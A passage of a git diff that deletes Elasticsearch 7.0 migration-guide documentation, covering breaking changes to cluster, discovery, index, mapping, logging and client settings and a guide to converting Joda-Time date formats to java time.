clear the cache. 
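For example (index name made up), the request now has to be issued with `POST`:

[source,console]
--------------------------------------------------
POST /my-index-000001/_cache/clear
--------------------------------------------------
// TEST[skip:illustrative sketch only]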
diff --git a/docs/reference/migration/migrate_7_0/cluster.asciidoc b/docs/reference/migration/migrate_7_0/cluster.asciidoc deleted file mode 100644 index fc0c636d7f8..00000000000 --- a/docs/reference/migration/migrate_7_0/cluster.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ -[discrete] -[[breaking_70_cluster_changes]] -=== Cluster changes - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - -[discrete] -[[_literal_literal_is_no_longer_allowed_in_cluster_name]] -==== `:` is no longer allowed in cluster name - -Due to cross-cluster search using `:` to separate a cluster and index name, -cluster names may no longer contain `:`. - -[discrete] -[[new-default-wait-for-active-shards-param]] -==== New default for `wait_for_active_shards` parameter of the open index command - -The default value for the `wait_for_active_shards` parameter of the open index API -is changed from 0 to 1, which means that the command will now by default wait for all -primary shards of the opened index to be allocated. - -[discrete] -[[shard-preferences-removed]] -==== Shard preferences `_primary`, `_primary_first`, `_replica`, and `_replica_first` are removed -These shard preferences are removed in favour of the `_prefer_nodes` and `_only_nodes` preferences. - -[discrete] -==== Cluster-wide shard soft limit -Clusters now have soft limits on the total number of open shards in the cluster -based on the number of nodes and the `cluster.max_shards_per_node` cluster -setting, to prevent accidental operations that would destabilize the cluster. -More information can be found in the <>. diff --git a/docs/reference/migration/migrate_7_0/discovery.asciidoc b/docs/reference/migration/migrate_7_0/discovery.asciidoc deleted file mode 100644 index e6adec80fe8..00000000000 --- a/docs/reference/migration/migrate_7_0/discovery.asciidoc +++ /dev/null @@ -1,86 +0,0 @@ -[discrete] -[[breaking_70_discovery_changes]] -=== Discovery changes - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - -[discrete] -==== Cluster bootstrapping is required if discovery is configured - -The first time a cluster is started, `cluster.initial_master_nodes` must be set -to perform cluster bootstrapping. It should contain the names of the -master-eligible nodes in the initial cluster and be defined on every -master-eligible node in the cluster. See <> for an example, and the -<> describes this setting in more detail. - -The `discovery.zen.minimum_master_nodes` setting is permitted, but ignored, on -7.x nodes. - -[discrete] -==== Removing master-eligible nodes sometimes requires voting exclusions - -If you wish to remove half or more of the master-eligible nodes from a cluster, -you must first exclude the affected nodes from the voting configuration using -the <>. -If you remove fewer than half of the master-eligible nodes at the same time, -voting exclusions are not required. If you remove only master-ineligible nodes -such as data-only nodes or coordinating-only nodes, voting exclusions are not -required. Likewise, if you add nodes to the cluster, voting exclusions are not -required. 
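As a sketch of that workflow, you add the affected nodes to the voting configuration exclusions before shutting them down, then clear the exclusions once the nodes have left the cluster. The node name below is hypothetical, and the exact URL form of this API varies across 7.x releases, so check the voting configuration exclusions API reference for your version.

[source,console]
--------------------------------------------------
POST /_cluster/voting_config_exclusions/master-node-1

DELETE /_cluster/voting_config_exclusions
--------------------------------------------------
// TEST[skip:sketch only, node name is hypothetical]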
- -[discrete] -==== Discovery configuration is required in production - -Production deployments of Elasticsearch now require at least one of the -following settings to be specified in the `elasticsearch.yml` configuration -file: - -- `discovery.seed_hosts` -- `discovery.seed_providers` -- `cluster.initial_master_nodes` -- `discovery.zen.ping.unicast.hosts` -- `discovery.zen.hosts_provider` - -The first three settings in this list are only available in versions 7.0 and -above. If you are preparing to upgrade from an earlier version, you must set -`discovery.zen.ping.unicast.hosts` or `discovery.zen.hosts_provider`. - -[discrete] -[[new-name-no-master-block-setting]] -==== New name for `no_master_block` setting - -The `discovery.zen.no_master_block` setting is now known as -`cluster.no_master_block`. Any value set for `discovery.zen.no_master_block` is -now ignored. You should remove this setting and, if needed, set -`cluster.no_master_block` appropriately after the upgrade. - -[discrete] -==== Reduced default timeouts for fault detection - -By default the <> subsystem -now considers a node to be faulty if it fails to respond to 3 consecutive -pings, each of which times out after 10 seconds. Thus a node that is -unresponsive for longer than 30 seconds is liable to be removed from the -cluster. Previously the default timeout for each ping was 30 seconds, so that -an unresponsive node might be kept in the cluster for over 90 seconds. - -[discrete] -==== Master-ineligible nodes are ignored by discovery - -In earlier versions it was possible to use master-ineligible nodes during the -discovery process, either as seed nodes or to transfer discovery gossip -indirectly between the master-eligible nodes. Clusters that relied on -master-ineligible nodes like this were fragile and unable to automatically -recover from some kinds of failure. Discovery now involves only the -master-eligible nodes in the cluster so that it is not possible to rely on -master-ineligible nodes like this. You should configure -<> to provide the addresses of all the master-eligible nodes in -your cluster. diff --git a/docs/reference/migration/migrate_7_0/indices.asciidoc b/docs/reference/migration/migrate_7_0/indices.asciidoc deleted file mode 100644 index ca3f4989670..00000000000 --- a/docs/reference/migration/migrate_7_0/indices.asciidoc +++ /dev/null @@ -1,105 +0,0 @@ -[discrete] -[[breaking_70_indices_changes]] -=== Indices changes - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - -[discrete] -==== Index creation no longer defaults to five shards -Previous versions of Elasticsearch defaulted to creating five shards per index. -Starting with 7.0.0, the default is now one shard per index. - -[discrete] -[[_literal_literal_is_no_longer_allowed_in_index_name]] -==== `:` is no longer allowed in index name - -Due to cross-cluster search using `:` to separate a cluster and index name, -index names may no longer contain `:`. - -[discrete] -[[index-unassigned-node-left-delayed-timeout-no-longer-negative]] -==== `index.unassigned.node_left.delayed_timeout` may no longer be negative - -Negative values were interpreted as zero in earlier versions but are no -longer accepted. 
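Any existing negative value should be replaced with `0` or a positive duration, for example (the index name is a placeholder):

[source,console]
--------------------------------------------------
PUT /my-index-000001/_settings
{
  "settings": {
    "index.unassigned.node_left.delayed_timeout": "0ms"
  }
}
--------------------------------------------------
// TEST[skip:sketch only, index name is hypothetical]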
- -[discrete] -[[flush-force-merge-no-longer-refresh]] -==== `_flush` and `_force_merge` will no longer refresh - -In previous versions issuing a `_flush` or `_force_merge` (with `flush=true`) -had the undocumented side-effect of refreshing the index which made new documents -visible to searches and non-realtime GET operations. From now on these operations -don't have this side-effect anymore. To make documents visible an explicit `_refresh` -call is needed unless the index is refreshed by the internal scheduler. - -[discrete] -==== Document distribution changes - -Indices created with version `7.0.0` onwards will have an automatic `index.number_of_routing_shards` -value set. This might change how documents are distributed across shards depending on how many -shards the index has. In order to maintain the exact same distribution as a pre `7.0.0` index, the -`index.number_of_routing_shards` must be set to the `index.number_of_shards` at index creation time. -Note: if the number of routing shards equals the number of shards `_split` operations are not supported. - -[discrete] -==== Skipped background refresh on search idle shards - -Shards belonging to an index that does not have an explicit -`index.refresh_interval` configured will no longer refresh in the background -once the shard becomes "search idle", ie the shard hasn't seen any search -traffic for `index.search.idle.after` seconds (defaults to `30s`). Searches -that access a search idle shard will be "parked" until the next refresh -happens. Indexing requests with `wait_for_refresh` will also trigger -a background refresh. - -[discrete] -==== Remove deprecated url parameters for Clear Indices Cache API - -The following previously deprecated url parameter have been removed: - -* `filter` - use `query` instead -* `filter_cache` - use `query` instead -* `request_cache` - use `request` instead -* `field_data` - use `fielddata` instead - -[discrete] -[[network-breaker-inflight-requests-overhead-increased-to-2]] -==== `network.breaker.inflight_requests.overhead` increased to 2 - -Previously the in flight requests circuit breaker considered only the raw byte representation. -By bumping the value of `network.breaker.inflight_requests.overhead` from 1 to 2, this circuit -breaker considers now also the memory overhead of representing the request as a structured object. - -[discrete] -==== Parent circuit breaker changes - -The parent circuit breaker defines a new setting `indices.breaker.total.use_real_memory` which is -`true` by default. This means that the parent circuit breaker will trip based on currently used -heap memory instead of only considering the reserved memory by child circuit breakers. When this -setting is `true`, the default parent breaker limit also changes from 70% to 95% of the JVM heap size. -The previous behavior can be restored by setting `indices.breaker.total.use_real_memory` to `false`. - -[discrete] -==== Field data circuit breaker changes -As doc values have been enabled by default in earlier versions of Elasticsearch, -there is less need for fielddata. Therefore, the default value of the setting -`indices.breaker.fielddata.limit` has been lowered from 60% to 40% of the JVM -heap size. - -[discrete] -[[fix-value-for-index-shard-check-on-startup-removed]] -==== `fix` value for `index.shard.check_on_startup` is removed - -Deprecated option value `fix` for setting `index.shard.check_on_startup` is not supported. 
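If your cluster relies on the old fielddata limit, the previous value can be restored dynamically; a sketch, assuming you really do want the former 60% default:

[source,console]
--------------------------------------------------
PUT /_cluster/settings
{
  "persistent": {
    "indices.breaker.fielddata.limit": "60%"
  }
}
--------------------------------------------------
// TEST[skip:sketch only, restores a pre-7.0 default]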
- -[discrete] -[[elasticsearch-translog-removed]] -==== `elasticsearch-translog` is removed - -Use the `elasticsearch-shard` tool to remove corrupted translog data. diff --git a/docs/reference/migration/migrate_7_0/ingest.asciidoc b/docs/reference/migration/migrate_7_0/ingest.asciidoc deleted file mode 100644 index 9345ec2a2e1..00000000000 --- a/docs/reference/migration/migrate_7_0/ingest.asciidoc +++ /dev/null @@ -1,27 +0,0 @@ -[discrete] -[[breaking_70_ingest_changes]] -=== API changes - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -[discrete] -==== Ingest configuration exception information is now transmitted in metadata field - -Previously, some ingest configuration exception information about ingest processors -was sent to the client in the HTTP headers, which is inconsistent with how -exceptions are conveyed in other parts of Elasticsearch. - -Configuration exception information is now conveyed as a field in the response -body. -//end::notable-breaking-changes[] -[discrete] -==== Ingest plugin special handling has been removed -There was some special handling for installing and removing the `ingest-geoip` and -`ingest-user-agent` plugins after they were converted to modules. This special handling -was done to minimize breaking users in a minor release, and would exit with a status code -zero to avoid breaking automation. - -This special handling has now been removed. diff --git a/docs/reference/migration/migrate_7_0/java.asciidoc b/docs/reference/migration/migrate_7_0/java.asciidoc deleted file mode 100644 index f01c0d428f6..00000000000 --- a/docs/reference/migration/migrate_7_0/java.asciidoc +++ /dev/null @@ -1,67 +0,0 @@ -[discrete] -[[breaking_70_java_changes]] -=== Java API changes - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - -[discrete] -[[isshardsacked-removed]] -==== `isShardsAcked` deprecated in `6.2` has been removed - -`isShardsAcked` has been replaced by `isShardsAcknowledged` in -`CreateIndexResponse`, `RolloverResponse` and -`CreateIndexClusterStateUpdateResponse`. - -[discrete] -[[prepareexecute-removed-client-api]] -==== `prepareExecute` removed from the client api - -The `prepareExecute` method which created a request builder has been -removed from the client api. Instead, construct a builder for the -appropriate request directly. - -[discrete] -==== Some Aggregation classes have moved packages - -* All classes present in `org.elasticsearch.search.aggregations.metrics.*` packages -were moved to a single `org.elasticsearch.search.aggregations.metrics` package. - -* All classes present in `org.elasticsearch.search.aggregations.pipeline.*` packages -were moved to a single `org.elasticsearch.search.aggregations.pipeline` package. In -addition, `org.elasticsearch.search.aggregations.pipeline.PipelineAggregationBuilders` -was moved to `org.elasticsearch.search.aggregations.PipelineAggregationBuilders` - - -[discrete] -[[retry-withbackoff-methods-removed]] -==== `Retry.withBackoff` methods with `Settings` removed - -The variants of `Retry.withBackoff` that included `Settings` have been removed -because `Settings` is no longer needed. - -[discrete] -[[client-termvector-removed]] -==== Deprecated method `Client#termVector` removed - -The client method `termVector`, deprecated in 2.0, has been removed. 
The method -`termVectors` (plural) should be used instead. - -[discrete] -[[abstractlifecyclecomponent-constructor-removed]] -==== Deprecated constructor `AbstractLifecycleComponent(Settings settings)` removed - -The constructor `AbstractLifecycleComponent(Settings settings)`, deprecated in 6.7 -has been removed. The parameterless constructor should be used instead. - -[discrete] -==== Changes to Geometry classes - -Geometry classes used to represent geo values in SQL have been moved from the -`org.elasticsearch.geo.geometry` package to the `org.elasticsearch.geometry` -package and the order of the constructor parameters has changed from `lat`, `lon` -to `lon`, `lat`. diff --git a/docs/reference/migration/migrate_7_0/java_time.asciidoc b/docs/reference/migration/migrate_7_0/java_time.asciidoc deleted file mode 100644 index 5968868a34e..00000000000 --- a/docs/reference/migration/migrate_7_0/java_time.asciidoc +++ /dev/null @@ -1,135 +0,0 @@ -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - -[discrete] -[[breaking_70_java_time_changes]] -=== Replacing Joda-Time with java time - -Since Java 8 there is a dedicated `java.time` package, which is superior to -the Joda-Time library, that has been used so far in Elasticsearch. One of -the biggest advantages is the ability to be able to store dates in a higher -resolution than milliseconds for greater precision. Also this will allow us -to remove the Joda-Time dependency in the future. - -The mappings, aggregations and search code switched from Joda-Time to -java time. - -[discrete] -==== Joda based date formatters are replaced with java ones - -With the release of Elasticsearch 6.7 a backwards compatibility layer was -introduced, that checked if you are using a Joda-Time based formatter, that is -supported differently in java time. A log message was emitted, and you could -create the proper java time based formatter prefixed with an `8`. - -With Elasticsearch 7.0 all formatters are now java based, which means you will -get exceptions when using deprecated formatters without checking the -deprecation log in 6.7. In the worst case you may even end up with different -dates. - -An example deprecation message looks like this, that is returned, when you -try to use a date formatter that includes a lower case `Y` - -[source,text] ----------- -Use of 'Y' (year-of-era) will change to 'y' in the next major version of -Elasticsearch. Prefix your date format with '8' to use the new specifier. ----------- - -So, instead of using `YYYY.MM.dd` you should use `8yyyy.MM.dd`. - -You can find more information about available formatting strings in the -https://docs.oracle.com/javase/8/docs/api/java/time/format/DateTimeFormatter.html[DateTimeFormatter javadocs]. - -[discrete] -==== Date formats behavioural change - -The `epoch_millis` and `epoch_second` formatters no longer support -scientific notation. - -If you are using the century of era formatter in a date (`C`), this will no -longer be supported. - -The year-of-era formatting character is a `Y` in Joda-Time, but a lowercase -`y` in java time. - -The week-based-year formatting character is a lowercase `x` in Joda-Time, -but an upper-case `Y` in java time. - -[discrete] -==== Using time zones in the Java client - -Timezones have to be specified as java time based zone objects. This means, -instead of using a `org.joda.time.DateTimeZone` the use of -`java.time.ZoneId` is required. 
- -Examples of possible uses are the `QueryStringQueryBuilder`, the -`RangeQueryBuilder` or the `DateHistogramAggregationBuilder`, each of them -allow for an optional timezone for that part of the search request. - -[discrete] -==== Parsing aggregation buckets in the Java client - -The date based aggregation buckets in responses used to be of -type `JodaTime`. Due to migrating to java-time, the buckets are now of -type `ZonedDateTime`. As the client is returning untyped objects here, you -may run into class cast exceptions only when running the code, but not at -compile time, ensure you have proper test coverage for this in your -own code. - -[discrete] -[[parsing-gtm0-timezeone-jdk8-not-supported]] -==== Parsing `GMT0` timezone with JDK8 is not supported - -When you are running Elasticsearch 7 with Java 8, you are not able to parse -the timezone `GMT0` properly anymore. The reason for this is a bug in the -JDK, which has not been fixed for JDK8. You can read more in the -https://bugs.openjdk.java.net/browse/JDK-8138664[official issue] -This bug is fixed in JDK9 and later versions. - -[discrete] -==== Scripting with dates should use java time based methods - -If dates are used in scripting, a backwards compatibility layer has been added -that emulates the Joda-Time methods, but logs a deprecation message as well -to use the java time methods. - -The following methods will be removed in future versions of Elasticsearch -and should be replaced. - -* `getDayOfWeek()` will be an enum instead of an int, if you need to use - an int, use `getDayOfWeekEnum().getValue()` -* `getMillis()` should be replaced with `toInstant().toEpochMilli()` -* `getCenturyOfEra()` should be replaced with `get(ChronoField.YEAR_OF_ERA) / 100` -* `getEra()` should be replaced with `get(ChronoField.ERA)` -* `getHourOfDay()` should be replaced with `getHour()` -* `getMillisOfDay()` should be replaced with `get(ChronoField.MILLI_OF_DAY)` -* `getMillisOfSecond()` should be replaced with `get(ChronoField.MILLI_OF_SECOND)` -* `getMinuteOfDay()` should be replaced with `get(ChronoField.MINUTE_OF_DAY)` -* `getMinuteOfHour()` should be replaced with `getMinute()` -* `getMonthOfYear()` should be replaced with `getMonthValue()` -* `getSecondOfDay()` should be replaced with `get(ChronoField.SECOND_OF_DAY)` -* `getSecondOfMinute()` should be replaced with `getSecond()` -* `getWeekOfWeekyear()` should be replaced with `get(WeekFields.ISO.weekOfWeekBasedYear())` -* `getWeekyear()` should be replaced with `get(WeekFields.ISO.weekBasedYear())` -* `getYearOfCentury()` should be replaced with `get(ChronoField.YEAR_OF_ERA) % 100` -* `getYearOfEra()` should be replaced with `get(ChronoField.YEAR_OF_ERA)` -* `toString(String)` should be replaced with a `DateTimeFormatter` -* `toString(String,Locale)` should be replaced with a `DateTimeFormatter` - -[discrete] -==== Negative epoch timestamps are no longer supported - -With the switch to java time, support for negative timestamps has been removed. -For dates before 1970, use a date format containing a year. - - -[discrete] -==== Migration guide -For a detailed migration guide, see <>. 
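For example, a script that used `getMillis()` on a date field can call the java time equivalent directly. The index and field names below are made up for illustration.

[source,console]
--------------------------------------------------
GET /my-index-000001/_search
{
  "script_fields": {
    "created_millis": {
      "script": "doc['created_at'].value.toInstant().toEpochMilli()"
    }
  }
}
--------------------------------------------------
// TEST[skip:sketch only, index and field names are hypothetical]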
- -include::migrate_to_java_time.asciidoc[] diff --git a/docs/reference/migration/migrate_7_0/logging.asciidoc b/docs/reference/migration/migrate_7_0/logging.asciidoc deleted file mode 100644 index d9180fd81bd..00000000000 --- a/docs/reference/migration/migrate_7_0/logging.asciidoc +++ /dev/null @@ -1,51 +0,0 @@ -[discrete] -[[breaking_70_logging_changes]] -=== Logging changes - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - -[discrete] -[[new-json-format-log-directory]] -==== New JSON format log files in `log` directory - -Elasticsearch now will produce additional log files in JSON format. They will be stored in `*.json` suffix files. -Following files should be expected now in log directory: -* ${cluster_name}_server.json -* ${cluster_name}_deprecation.json -* ${cluster_name}_index_search_slowlog.json -* ${cluster_name}_index_indexing_slowlog.json -* ${cluster_name}.log -* ${cluster_name}_deprecation.log -* ${cluster_name}_index_search_slowlog.log -* ${cluster_name}_index_indexing_slowlog.log -* ${cluster_name}_audit.json -* gc.log - -Note: You can configure which of these files are written by editing `log4j2.properties`. - -[discrete] -[[log-files-ending-log-deprecated]] -==== Log files ending with `*.log` deprecated -Log files with the `.log` file extension using the old pattern layout format -are now considered deprecated and the newly added JSON log file format with -the `.json` file extension should be used instead. -Note: GC logs which are written to the file `gc.log` will not be changed. - -[discrete] -==== Docker output in JSON format - -All Docker console logs are now in JSON format. You can distinguish logs streams with the `type` field. - -[discrete] -==== Audit plaintext log file removed, JSON file renamed - -Elasticsearch no longer produces the `${cluster_name}_access.log` plaintext -audit log file. The `${cluster_name}_audit.log` files also no longer exist; they -are replaced by `${cluster_name}_audit.json` files. When auditing is enabled, -auditing events are stored in these dedicated JSON log files on each node. - diff --git a/docs/reference/migration/migrate_7_0/low_level_restclient.asciidoc b/docs/reference/migration/migrate_7_0/low_level_restclient.asciidoc deleted file mode 100644 index 79654f0f6d5..00000000000 --- a/docs/reference/migration/migrate_7_0/low_level_restclient.asciidoc +++ /dev/null @@ -1,37 +0,0 @@ -[discrete] -[[breaking_70_low_level_restclient_changes]] -=== Low-level REST client changes - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - -[discrete] -[[maxretrytimeout-removed]] -==== Support for `maxRetryTimeout` removed from RestClient - -`RestClient` and `RestClientBuilder` no longer support the `maxRetryTimeout` -setting. The setting was removed as its counting mechanism was not accurate -and caused issues while adding little value. - -[discrete] -==== Deprecated flavors of performRequest have been removed - -We deprecated the flavors of `performRequest` and `performRequestAsync` that -do not take `Request` objects in 6.4.0 in favor of the flavors that take -`Request` objects because those methods can be extended without breaking -backwards compatibility. 
- -[discrete] -==== Removed setHosts - -We deprecated `setHosts` in 6.4.0 in favor of `setNodes` because it supports -host metadata used by the `NodeSelector`. - -[discrete] -==== Minimum compiler version change -The minimum compiler version on the low-level REST client has been bumped -to JDK 8. diff --git a/docs/reference/migration/migrate_7_0/mappings.asciidoc b/docs/reference/migration/migrate_7_0/mappings.asciidoc deleted file mode 100644 index 0eb7b8c310b..00000000000 --- a/docs/reference/migration/migrate_7_0/mappings.asciidoc +++ /dev/null @@ -1,119 +0,0 @@ -[discrete] -[[breaking_70_mappings_changes]] -=== Mapping changes - -//NOTE: The notable-breaking-changes tagged regions are re-used in the -//Installation and Upgrade Guide - -//tag::notable-breaking-changes[] - -// end::notable-breaking-changes[] - -[discrete] -[[all-meta-field-removed]] -==== The `_all` metadata field is removed - -The `_all` field deprecated in 6 have now been removed. - -[discrete] -[[uid-meta-field-removed]] -==== The `_uid` metadata field is removed - -This field used to index a composite key formed of the `_type` and the `_id`. -Now that indices cannot have multiple types, this has been removed in favour -of `_id`. - -//tag::notable-breaking-changes[] -[discrete] -[[default-mapping-not-allowed]] -==== The `_default_` mapping is no longer allowed - -The `_default_` mapping has been deprecated in 6.0 and is now no longer allowed -in 7.0. Trying to configure a `_default_` mapping on 7.x indices will result in -an error. - -If an index template contains a `_default_` mapping, it will fail to create new -indices. To resolve this issue, the `_default_` mapping should be removed from -the template. Note that in 7.x, the <> -does not show the `_default_` mapping by default, even when it is defined in -the mapping. To see all mappings in the template, the `include_type_name` -parameter must be supplied: - -``` -GET /_template/my_template?include_type_name -``` - -For more details on the `include_type_name` parameter and other types-related -API changes, please see <>. -//end::notable-breaking-changes[] - -[discrete] -[[index-options-numeric-fields-removed]] -==== `index_options` for numeric fields has been removed - -The `index_options` field for numeric fields has been deprecated in 6 and has now been removed. - -[discrete] -[[limit-number-nested-json-objects]] -==== Limiting the number of `nested` json objects - -To safeguard against out of memory errors, the number of nested json objects within a single -document across all fields has been limited to 10000. This default limit can be changed with -the index setting `index.mapping.nested_objects.limit`. - -[discrete] -[[update-all-types-option-removed]] -==== The `update_all_types` option has been removed - -This option is useless now that all indices have at most one type. - -[discrete] -[[classic-similarity-removed]] -==== The `classic` similarity has been removed - -The `classic` similarity relied on coordination factors for scoring to be good -in presence of stopwords in the query. This feature has been removed from -Lucene, which means that the `classic` similarity now produces scores of lower -quality. It is advised to switch to `BM25` instead, which is widely accepted -as a better alternative. - -[discrete] -==== Similarities fail when unsupported options are provided - -An error will now be thrown when unknown configuration options are provided -to similarities. Such unknown parameters were ignored before. 
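For the `nested` object limit described above, indices that legitimately need more objects can raise the limit at index creation time; a sketch with made-up names and an arbitrary value:

[source,console]
--------------------------------------------------
PUT /my-index-000001
{
  "settings": {
    "index.mapping.nested_objects.limit": 20000
  },
  "mappings": {
    "properties": {
      "comments": { "type": "nested" }
    }
  }
}
--------------------------------------------------
// TEST[skip:sketch only, names and limit are hypothetical]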
- -[discrete] -[[changed-default-geo-shape-index-strategy]] -==== Changed default `geo_shape` indexing strategy - -`geo_shape` types now default to using a vector indexing approach based on Lucene's new -`LatLonShape` field type. This indexes shapes as a triangular mesh instead of decomposing -them into individual grid cells. To index using legacy prefix trees the `tree` parameter -must be explicitly set to one of `quadtree` or `geohash`. Note that these strategies are -now deprecated and will be removed in a future version. - -IMPORTANT NOTE: If using timed index creation from templates, the `geo_shape` mapping -should also be changed in the template to explicitly define `tree` to one of `geohash` -or `quadtree`. This will ensure compatibility with previously created indexes. - -[discrete] -[[deprecated-geo-shape-params]] -==== Deprecated `geo_shape` parameters - -The following type parameters are deprecated for the `geo_shape` field type: `tree`, -`precision`, `tree_levels`, `distance_error_pct`, `points_only`, and `strategy`. They -will be removed in a future version. - -[discrete] -==== Limiting the number of completion contexts - -The maximum allowed number of completion contexts in a mapping will be limited -to 10 in the next major version. Completion fields that define more than 10 -contexts in a mapping will log a deprecation warning in this version. - -[discrete] -[[include-type-name-defaults-false]] -==== `include_type_name` now defaults to `false` -The default for `include_type_name` is now `false` for all APIs that accept -the parameter. diff --git a/docs/reference/migration/migrate_7_0/migrate_to_java_time.asciidoc b/docs/reference/migration/migrate_7_0/migrate_to_java_time.asciidoc deleted file mode 100644 index fc8feef6bf7..00000000000 --- a/docs/reference/migration/migrate_7_0/migrate_to_java_time.asciidoc +++ /dev/null @@ -1,417 +0,0 @@ -[[migrate-to-java-time]] -=== Java time migration guide - -With 7.0, {es} switched from joda time to java time for date-related parsing, -formatting, and calculations. This guide is designed to help you determine -if your cluster is impacted and, if so, prepare for the upgrade. - -You do not need to convert joda-time date formats to java time for indices -created in {es} 6.8 before upgrading to 7.7 or later versions. However, mappings -for indices created in 7.7 and later versions must use java-time formats. - -To ensure new indices use java-time formats, we recommend you update any ingest -pipelines and index templates created in 6.8 to java time before upgrading. See: - -* <> -* <> - -Indices created in versions 7.0-7.6 cannot use joda time. This was fixed -was in 7.7 with {es-pull}52555[#52555]. -[discrete] -[[java-time-convert-date-formats]] -=== Convert date formats - -To use java time in 6.8, prefix the date format with an `8`. -For example, you can change the date format `YYYY-MM-dd` to `8yyyy-MM-dd` to -indicate the date format uses java time. - -{es} treats date formats starting with the `8` prefix differently depending on -the version: - -*6.8*: Date formats with an `8` prefix are handled as java-time formats. Date -formats without an `8` prefix are treated as joda-time formats. We recommend -converting these joda-time formats to java-time _before_ upgrading to 7.x. - -*7.x and later*: For indices created in 6.x, date formats without an `8` prefix -are treated as joda-time formats. 
For indices created in 7.x and later versions, -all date formats are treated as java-time formats, regardless of whether it -starts with an `8` prefix. - -[[java-time-migration-impacted-features]] -==== Impacted features -The switch to java time only impacts custom <> and -<> formats. - -These formats are commonly used in: - -* <> -* <> -* <> - -If you don't use custom date formats, you can skip the rest of this guide. -Most custom date formats are compatible. However, several require -an update. - -To see if your date format is impacted, use the <> -or the {kibana-ref}/upgrade-assistant.html[Kibana upgrade assistant]. - -[[java-time-migration-incompatible-date-formats]] -==== Incompatible date formats -Custom date formats containing the following joda-time literals should be -converted to their java-time equivalents. - -`Y` (Year of era):: -+ --- -Replace with `y`. - -*Example:* -`YYYY-MM-dd` should become `yyyy-MM-dd`. - -In java time, `Y` is used for -https://docs.oracle.com/javase/8/docs/api/java/time/temporal/WeekFields.html[week-based year]. -Using `Y` in place of `y` could result in off-by-one errors in year calculation. - -For pattern `YYYY-ww` and date `2019-01-01T00:00:00.000Z` will give `2019-01` -For pattern `YYYY-ww` and date `2018-12-31T00:00:00.000Z` will give `2019-01` (counter-intuitive) because there is >4 days of that week in 2019 --- - -`y` (Year):: -+ --- -Replace with `u`. - -*Example:* -`yyyy-MM-dd` should become `uuuu-MM-dd`. - -In java time, `y` is used for year of era. `u` can contain non-positive -values while `y` cannot. `y` can also be associated with an era field. --- - - -`C` (Century of era):: -+ --- -Century of era is not supported in java time. -There is no replacement. Instead, we recommend you preprocess your input. --- - -`x` (Week year):: -+ --- -Replace with `Y`. - -In java time, `x` means https://docs.oracle.com/javase/8/docs/api/java/time/format/DateTimeFormatter.html[zone-offset]. - -[WARNING] -==== -Failure to properly convert `x` (Week year) to `Y` could result in data loss. -==== --- - -`Z` (Zone offset/id):: -+ --- -Replace with multiple `X`'s. - -`Z` has a similar meaning in java time. However, java time expects different -numbers of literals to parse different forms. - -Consider migrating to `X`, which gives you more control over how time is parsed. 
-For example, the joda-time format `YYYY-MM-dd'T'hh:mm:ssZZ` accepts the following dates: - -``` -2010-01-01T01:02:03Z -2010-01-01T01:02:03+01 -2010-01-01T01:02:03+01:02 -2010-01-01T01:02:03+01:02:03 -``` - -In java time, you cannot parse all these dates using a single format -Instead, you must specify 3 separate formats: - -``` -2010-01-01T01:02:03Z -2010-01-01T01:02:03+01 -both parsed with yyyy-MM-dd'T'hh:mm:ssX - -2010-01-01T01:02:03+01:02 -yyyy-MM-dd'T'hh:mm:ssXXX - -2010-01-01T01:02:03+01:02:03 -yyyy-MM-dd'T'hh:mm:ssXXXXX -``` - - -The formats must then be delimited using `||`: -[source,txt] --------------------------------------------------- -yyyy-MM-dd'T'hh:mm:ssX||yyyy-MM-dd'T'hh:mm:ssXXX||yyyy-MM-dd'T'hh:mm:ssXXXXX --------------------------------------------------- - -The same applies if you expect your pattern to occur without a colon (`:`): -For example, the `YYYY-MM-dd'T'hh:mm:ssZ` format accepts the following date forms: -``` -2010-01-01T01:02:03Z -2010-01-01T01:02:03+01 -2010-01-01T01:02:03+0102 -2010-01-01T01:02:03+010203 -``` -To accept all these forms in java time, you must use the `||` delimiter: -[source,txt] --------------------------------------------------- -yyyy-MM-dd'T'hh:mm:ssX||yyyy-MM-dd'T'hh:mm:ssXX||yyyy-MM-dd'T'hh:mm:ssXXXX --------------------------------------------------- --- - -`d` (Day):: -+ --- -In java time, `d` is still interpreted as "day" but is less flexible. - -For example, the joda-time date format `YYYY-MM-dd` accepts `2010-01-01` or -`2010-01-1`. - -In java time, you must use the `||` delimiter to provide specify each format: - -[source,txt] --------------------------------------------------- -yyyy-MM-dd||yyyy-MM-d --------------------------------------------------- - -In java time, `d` also does not accept more than 2 digits. To accept days with more -than two digits, you must include a text literal in your java-time date format. -For example, to parse `2010-01-00001`, you must use the following java-time date format: - -[source,txt] --------------------------------------------------- -yyyy-MM-'000'dd --------------------------------------------------- --- - -`e` (Name of day):: -+ --- -In java time, `e` is still interpreted as "name of day" but does not parse -short- or full-text forms. - -For example, the joda-time date format `EEE YYYY-MM` accepts both -`Wed 2020-01` and `Wednesday 2020-01`. - -To accept both of these dates in java time, you must specify each format using -the `||` delimiter: - -[source,txt] --------------------------------------------------- -cccc yyyy-MM||ccc yyyy-MM --------------------------------------------------- - -The joda-time literal `E` is interpreted as "day of week." -The java-time literal `c` is interpreted as "localized day of week." -`E` does not accept full-text day formats, such as `Wednesday`. --- - -`EEEE` and similar text forms:: -+ --- -Support for full-text forms depends on the locale data provided with your Java -Development Kit (JDK) and other implementation details. We recommend you -test formats containing these patterns carefully before upgrading. --- - -`z` (Time zone text):: -+ --- -In java time, `z` outputs 'Z' for Zulu when given a UTC timezone. --- - -[[java-time-migration-test]] -===== Test with your data - -We strongly recommend you test any date format 